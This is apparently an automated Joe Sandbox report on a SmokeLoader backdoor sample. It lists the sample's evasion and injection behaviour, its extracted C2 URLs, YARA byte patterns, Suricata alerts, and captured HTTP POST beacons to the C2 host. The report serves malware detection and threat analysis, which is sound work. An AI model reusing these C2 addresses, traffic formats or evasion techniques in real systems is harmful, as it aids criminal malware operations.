Edit tour

Windows Analysis Report
k8JAXb3Lhs.exe

Overview

General Information

Sample name:	k8JAXb3Lhs.exe renamed because original name is a hash value
Original sample name:	eead7a529f768cd0a74a639ff806357c.exe
Analysis ID:	1523398
MD5:	eead7a529f768cd0a74a639ff806357c
SHA1:	5fea9c1f649f81dfca7f19af1cabc8aab2b01829
SHA256:	2c84b412d0ab9a058d88e5b34e0921c06da1ba11703ef71c124050406dad1844
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

k8JAXb3Lhs.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\k8JAXb3Lhs.exe" MD5: EEAD7A529F768CD0A74A639FF806357C)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

sfjujsr (PID: 2128 cmdline: C:\Users\user\AppData\Roaming\sfjujsr MD5: EEAD7A529F768CD0A74A639FF806357C)

sfjujsr (PID: 3452 cmdline: C:\Users\user\AppData\Roaming\sfjujsr MD5: EEAD7A529F768CD0A74A639FF806357C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12709:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x120a9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\sfjujsr, CommandLine: C:\Users\user\AppData\Roaming\sfjujsr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sfjujsr, NewProcessName: C:\Users\user\AppData\Roaming\sfjujsr, OriginalFileName: C:\Users\user\AppData\Roaming\sfjujsr, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\sfjujsr, ProcessId: 2128, ProcessName: sfjujsr

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T15:17:23.620395+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	78.89.199.216	80	TCP
2024-10-01T15:17:24.752008+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	78.89.199.216	80	TCP
2024-10-01T15:17:25.914811+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	78.89.199.216	80	TCP
2024-10-01T15:17:27.029533+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	78.89.199.216	80	TCP
2024-10-01T15:17:28.206437+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	78.89.199.216	80	TCP
2024-10-01T15:17:29.341890+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	78.89.199.216	80	TCP
2024-10-01T15:17:30.500449+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	78.89.199.216	80	TCP
2024-10-01T15:17:31.641582+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	78.89.199.216	80	TCP
2024-10-01T15:17:33.261390+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	78.89.199.216	80	TCP
2024-10-01T15:17:34.418617+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	78.89.199.216	80	TCP
2024-10-01T15:17:35.545596+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	78.89.199.216	80	TCP
2024-10-01T15:17:36.688527+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	78.89.199.216	80	TCP
2024-10-01T15:17:37.858454+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	78.89.199.216	80	TCP
2024-10-01T15:17:38.979866+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	78.89.199.216	80	TCP
2024-10-01T15:17:40.096823+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	78.89.199.216	80	TCP
2024-10-01T15:17:41.358376+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	78.89.199.216	80	TCP
2024-10-01T15:17:42.684467+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	78.89.199.216	80	TCP
2024-10-01T15:17:43.812303+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	78.89.199.216	80	TCP
2024-10-01T15:17:45.121736+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	78.89.199.216	80	TCP
2024-10-01T15:17:46.345239+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	78.89.199.216	80	TCP
2024-10-01T15:17:47.480934+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	78.89.199.216	80	TCP
2024-10-01T15:17:48.777574+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	78.89.199.216	80	TCP
2024-10-01T15:17:49.901493+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	78.89.199.216	80	TCP
2024-10-01T15:17:50.981956+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49759	78.89.199.216	80	TCP
2024-10-01T15:17:52.350953+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	78.89.199.216	80	TCP
2024-10-01T15:17:53.596376+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49761	78.89.199.216	80	TCP
2024-10-01T15:18:59.724566+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49763	78.89.199.216	80	TCP
2024-10-01T15:19:06.035186+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49764	78.89.199.216	80	TCP
2024-10-01T15:19:11.806618+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49765	78.89.199.216	80	TCP
2024-10-01T15:19:18.036708+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49766	78.89.199.216	80	TCP
2024-10-01T15:19:23.665761+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49767	78.89.199.216	80	TCP
2024-10-01T15:19:30.039822+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49768	78.89.199.216	80	TCP
2024-10-01T15:19:35.601803+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49769	78.89.199.216	80	TCP
2024-10-01T15:19:42.320909+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49770	78.89.199.216	80	TCP
2024-10-01T15:19:47.791066+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49771	78.89.199.216	80	TCP
2024-10-01T15:19:56.389866+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	187.131.253.169	80	TCP
2024-10-01T15:20:02.025493+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49773	187.131.253.169	80	TCP
2024-10-01T15:20:07.324998+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49774	187.131.253.169	80	TCP
2024-10-01T15:20:13.530972+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49775	187.131.253.169	80	TCP
2024-10-01T15:20:19.524009+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49776	187.131.253.169	80	TCP
2024-10-01T15:20:25.648095+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49777	187.131.253.169	80	TCP
2024-10-01T15:20:31.521429+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49778	187.131.253.169	80	TCP
2024-10-01T15:20:36.199335+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49779	187.131.253.169	80	TCP
2024-10-01T15:20:41.110917+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49780	187.131.253.169	80	TCP
2024-10-01T15:20:47.770977+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49781	187.131.253.169	80	TCP
2024-10-01T15:20:54.025223+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49782	187.131.253.169	80	TCP
2024-10-01T15:20:59.510649+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49783	187.131.253.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: k8JAXb3Lhs.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\sfjujsr

Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\sfjujsr

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: k8JAXb3Lhs.exe

Joe Sandbox ML: detected

Source: k8JAXb3Lhs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 187.131.253.169:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 78.89.199.216:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 78.89.199.216:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 187.131.253.169 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View

IP Address: 78.89.199.216 78.89.199.216

Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: WATANIYATELECOM-ASKW WATANIYATELECOM-ASKW

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bhqjnnqelycixny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://puyhtqcmdpxpluct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wcdxuymrcevjnpq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://furydiibsxgmyj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://riurefweuxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yduxerbrsufspya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ysuvstjxegoleu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ppentvmtanft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iyujkbbljdajhtr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://awdlidomwbvuuhth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nrwpjmrfkgs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikextycmggavxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xflbmtqhirja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pyqfoqocstl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dijxohecsahmqya.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fkwktqlntyvhlhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://axuolhuhwntg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://obobrllwrvxobu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://flkhebcbosbhs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sdipfhxrqta.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecqgmfmehrdfesh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmyvyfvgexcutc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gahrsvlvghgft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: nwgrus.ru
